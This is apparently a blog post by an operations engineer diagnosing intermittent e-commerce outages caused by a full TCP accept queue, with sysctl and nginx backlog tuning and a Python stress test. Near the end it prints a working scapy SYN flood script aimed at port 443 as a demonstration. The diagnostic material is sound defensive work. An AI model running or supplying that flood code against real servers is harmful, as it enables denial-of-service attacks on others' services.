Author: Liu Xiaoming, head of operations and maintenance technology at an Internet company, with 10 years of experience in Internet development and operations. He has long been committed to building operations tools and promoting expert operations services that empower development and improve efficiency. A word of self-promotion: when you have time, you are welcome to visit my Zhihu account (Cloth Road) and read the "Development operations" column. Follows and likes are the best encouragement for the author!

Problem Description:

  1. The monitoring system found that the e-commerce site's home page and other pages were intermittently inaccessible.
  2. Security protection, network traffic, and application system load all checked out as normal.
  3. Restarting the system resolved the problem temporarily, but the intermittent failures returned after a period of time.

By this point the problem was affecting normal business across the entire website, and I was scared: the main alarm system had raised no alarms, every service appeared to be running normally, and I broke out in a cold sweat. Still, I had to stay calm, look carefully for clues, and track down the problem step by step.

Preliminary diagnosis:

1. Check whether there are errors and drops at the device and NIC layers

Running cat /proc/net/dev and ifconfig showed no exceptions at the hardware and system layers.
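
The check in step 1 can be scripted. The following is a minimal sketch, assuming the usual Linux layout of /proc/net/dev (two header lines, then one line per interface with 16 counters after the colon). The function names parse_net_dev and interfaces_with_problems are hypothetical helpers introduced for illustration.

```python
def parse_net_dev(text):
    """Extract error and drop counters per interface from /proc/net/dev text."""
    stats = {}
    for line in text.splitlines()[2:]:  # the first two lines are column headers
        if ':' not in line:
            continue
        name, data = line.split(':', 1)
        fields = [int(x) for x in data.split()]
        # Receive counters occupy fields 0-7, transmit counters fields 8-15.
        stats[name.strip()] = {
            'rx_errs': fields[2], 'rx_drop': fields[3],
            'tx_errs': fields[10], 'tx_drop': fields[11],
        }
    return stats


def interfaces_with_problems(stats):
    """Return the names of interfaces with any non-zero error or drop counter."""
    return sorted(name for name, s in stats.items() if any(s.values()))
```

On a Linux host, passing the contents of /proc/net/dev to parse_net_dev and the result to interfaces_with_problems lists the interfaces worth a closer look. An empty list matches the "no exceptions" finding above.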

2. Check for socket overflows and dropped sockets. If the application takes connections off the accept queue too slowly, the accept queue overflows (socket overflow); if the SYN queue overflows, sockets are dropped.

Running netstat -s | grep -i listen showed a sharp increase in both the socket overflow and socket dropped counters.
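
The counters that netstat -s reports here can also be read directly. The sketch below assumes the Linux /proc/net/netstat format, in which a "TcpExt:" line of counter names is followed by a "TcpExt:" line of values, and that the two counters of interest are named ListenOverflows and ListenDrops. The helpers parse_tcpext and listen_queue_delta are hypothetical names.

```python
def parse_tcpext(text):
    """Parse the TcpExt group of /proc/net/netstat into {counter_name: value}."""
    lines = [l for l in text.splitlines() if l.startswith('TcpExt:')]
    names = lines[0].split()[1:]                       # first line: counter names
    values = [int(v) for v in lines[1].split()[1:]]    # second line: values
    return dict(zip(names, values))


def listen_queue_delta(before, after):
    """Return how much the listen-queue counters grew between two snapshots."""
    return {k: after[k] - before[k] for k in ('ListenOverflows', 'ListenDrops')}
```

Taking two snapshots a few seconds apart and comparing them with listen_queue_delta shows whether the counters are still climbing, which is what matters here: the absolute values only say that an overflow happened at some point since boot.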

3. Check the sysctl kernel parameters backlog, somaxconn, and file-max, as well as the application's backlog

In the ss -lnt output, Send-Q for a listening socket is the minimum of the preceding parameters. The queues on port 80 and port 443 had exceeded that default value.
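
To spot saturated listeners quickly, the ss -lnt output can be filtered. This is a rough sketch, assuming the common column order State, Recv-Q, Send-Q, Local Address:Port, where for a LISTEN socket Recv-Q is the current accept queue length and Send-Q is its limit. The function name full_accept_queues is hypothetical, and treating Recv-Q >= Send-Q as "full" is a heuristic rather than the kernel's exact test.

```python
def full_accept_queues(ss_output):
    """Return (local_address, recv_q, send_q) for listeners at or over their limit."""
    full = []
    for line in ss_output.splitlines():
        parts = line.split()
        # Skip the header line and anything that is not a listening socket.
        if len(parts) < 4 or parts[0] != 'LISTEN':
            continue
        recv_q, send_q = int(parts[1]), int(parts[2])
        if recv_q >= send_q:
            full.append((parts[3], recv_q, send_q))
    return full
```

The input would typically come from something like subprocess.run(['ss', '-lnt'], capture_output=True, text=True).stdout on the affected host.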

4. Check whether SELinux and NetworkManager are enabled or disabled

5. Check whether timestamps, reuse, and recycle are enabled (tcp_timestamps, tcp_tw_reuse, tcp_tw_recycle). If clients connect through NAT, recycle must be disabled

6. Capture packets to determine whether SYNs are being received without any response being sent

In-depth analysis of the problem:

Normal three-way TCP connection handshake:

  • Step 1: The client sends a SYN to the server to initiate a handshake.
  • Step 2: The server replies with SYN + ACK to the client.
  • Step 3: After receiving a SYN + ACK, the client replies with an ACK indicating that it has received a SYN + ACK from the server.

The accept queue was full when TCP connections were being established. After checking several more times, the overflow count kept growing, so it is clear that the full connection queue on the server must have overflowed.

Then check how the OS handles the overflow:

# cat /proc/sys/net/ipv4/tcp_abort_on_overflow


A tcp_abort_on_overflow value of 0 means that if the full connection queue is full at step 3 of the three-way handshake, the server discards the ACK sent by the client.

To prove that the client application's exceptions were related to the full connection queue, I changed tcp_abort_on_overflow to 1. A value of 1 means that if the full connection queue is full at step 3, the server sends a reset (RST) packet to the client, abandoning the handshake and the connection (which was never established on the server side).

Testing then showed many connection reset by peer errors in the web service's exception log, which proves that the client errors were caused by this.

Of the sysctl kernel parameters (backlog, somaxconn, file-max) and the nginx backlog, ss -ln shows the minimum value, 128, as Send-Q. Recv-Q was 129, so requests were being discarded. The parameters above were modified and tuned as follows:

  • net.ipv4.tcp_syncookies = 1
  • net.ipv4.tcp_max_syn_backlog = 16384
  • net.core.somaxconn = 16384
  • nginx: backlog=32768;
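
Because the kernel caps the backlog passed to listen() at net.core.somaxconn, the settings above interact. A small sketch, assuming standard Linux behavior and using the hypothetical helper names effective_backlog and read_sysctl, shows the limit that actually applies and how the running values could be read back from /proc/sys:

```python
import os


def effective_backlog(app_backlog, somaxconn):
    """Accept queue limit the kernel applies: the smaller of the two values."""
    return min(app_backlog, somaxconn)


def read_sysctl(name, root='/proc/sys'):
    """Read a sysctl such as 'net.core.somaxconn' from the /proc/sys tree."""
    path = os.path.join(root, *name.split('.'))
    with open(path) as f:
        return f.read().strip()
```

With the values listed above, effective_backlog(32768, 16384) gives 16384, so the nginx backlog is limited by somaxconn. With the earlier default somaxconn of 128, any larger application backlog was capped at 128, which matches the Send-Q of 128 seen in ss.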

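A multithreaded stress test in Python found no new problems:

import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor

url = ''  # page under test; the address is not given in the original
def fetch(link):
    try:
        requests.get(link, timeout=5)  # request one linked page
    except Exception as err:
        print('return error msg:'+str(err))
soup = BeautifulSoup(requests.get(url).text, 'html.parser')
with ThreadPoolExecutor(20) as ex:
    for each_a_tag in soup.find_all('a'):
        ex.submit(fetch, each_a_tag.get('href'))  # 20 worker threads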

Understanding the connection flow and queues during the TCP handshake

As shown in the figure above, there are two queues: the SYN queue (half-connection queue) and the accept queue (full connection queue).

In the three-way handshake, after the server receives the SYN from the client, it puts the connection information into the half-connection queue and replies to the client with SYN + ACK. SYN flood attacks, for example, target this stage (a detailed introduction and demo are given below). When the server then receives the ACK from the client, it moves the information from the half-connection queue into the full connection queue if the full connection queue is not full. Otherwise, the server acts according to the tcp_abort_on_overflow setting.

If the full connection queue is full and tcp_abort_on_overflow is 0, the server resends the SYN + ACK to the client after a certain period of time. If the client's timeout is short, an exception occurs on the client.
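
The interaction between the two queues and tcp_abort_on_overflow can be illustrated with a toy model. This is a simplified sketch for reasoning about the behavior described above, not kernel code: the Listener class, its method names, and the returned strings are all made up for illustration, and timers and retransmissions are left out.

```python
from collections import deque


class Listener:
    """Toy model of a listening socket's half-connection and full connection queues."""

    def __init__(self, syn_backlog, accept_backlog, abort_on_overflow=0):
        self.syn_queue = set()        # half-open connections (SYN received)
        self.accept_queue = deque()   # completed connections awaiting accept()
        self.syn_backlog = syn_backlog
        self.accept_backlog = accept_backlog
        self.abort_on_overflow = abort_on_overflow

    def on_syn(self, client):
        """Step 1 arrives: queue the half-open connection or drop the SYN."""
        if len(self.syn_queue) >= self.syn_backlog:
            return 'DROP'
        self.syn_queue.add(client)
        return 'SYN+ACK'

    def on_ack(self, client):
        """Step 3 arrives: promote to the accept queue if there is room."""
        if client not in self.syn_queue:
            return 'IGNORED'
        if len(self.accept_queue) >= self.accept_backlog:
            if self.abort_on_overflow:
                self.syn_queue.discard(client)
                return 'RST'
            # The ACK is discarded and the entry stays half-open, so a real
            # server would resend SYN+ACK later.
            return 'ACK_DROPPED'
        self.syn_queue.discard(client)
        self.accept_queue.append(client)
        return 'ESTABLISHED'

    def accept(self):
        """The application takes one completed connection off the queue."""
        return self.accept_queue.popleft() if self.accept_queue else None
```

In this model, a slow application that rarely calls accept() leaves the accept queue full, so later ACKs come back as ACK_DROPPED (or RST when abort_on_overflow is 1), which corresponds to the client-side timeouts and connection reset by peer errors seen in this incident.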

SYN flood attacks

One of the most popular forms of DoS (denial of service) and DDoS (distributed denial of service) attack, the SYN flood exploits a weakness in TCP: it makes the attacked server hold a large number of half-open connections in the SYN_RECV state, and the server retries the second handshake packet five times by default, which fills the TCP wait queue. The resulting resource exhaustion (full CPU load or insufficient memory) prevents normal business requests from connecting. A SYN flood attack in Python:

from concurrent.futures import ThreadPoolExecutor
from scapy.all import *

def synFlood(tgt, dPort):
    srcList = ['', '', '', '']  # source addresses are blank in the original
    for sPort in range(1024, 65535):
        index = random.randrange(4)
        ipLayer = IP(src=srcList[index], dst=tgt)
        tcpLayer = TCP(sport=sPort, dport=dPort, flags='S')
        packet = ipLayer/tcpLayer
        send(packet)

tgt = ''  # target address is blank in the original
print(tgt)
dPort = 443
with ThreadPoolExecutor(10000000) as ex:
    try:
        ex.submit(synFlood(tgt, dPort))
    except Exception as err:
        print('return error msg:' + str(err))
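
On the server side, the buildup of SYN_RECV connections described in this section can be watched per port. The sketch below assumes the Linux /proc/net/tcp format, where the fourth column is a hexadecimal state code (03 for SYN_RECV) and the local address is written as hex IP:port. The function name syn_recv_by_port is a hypothetical helper.

```python
from collections import Counter

SYN_RECV = '03'  # TCP state code for SYN_RECV in /proc/net/tcp


def syn_recv_by_port(proc_net_tcp_text):
    """Count half-open (SYN_RECV) connections per local port."""
    counts = Counter()
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip the header line
        fields = line.split()
        if len(fields) > 3 and fields[3] == SYN_RECV:
            # local_address looks like '0100007F:01BB'; the port is hexadecimal.
            port = int(fields[1].rsplit(':', 1)[1], 16)
            counts[port] += 1
    return counts
```

A count on port 443 or 80 that stays high while established connections stay flat is one sign of a SYN flood rather than ordinary load.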

The TCP half-connection queue and full connection queue are easy to overlook but critical, especially for applications that use short-lived connections, where this kind of problem is more likely to erupt. When it does, network traffic, CPU, threads, and load all look normal; the client sees high response times (RT), while the server-side logs show short ones. How to avoid scrambling when a problem strikes, and how to build an emergency response mechanism, is a topic I will write about in a separate article when I get the chance.
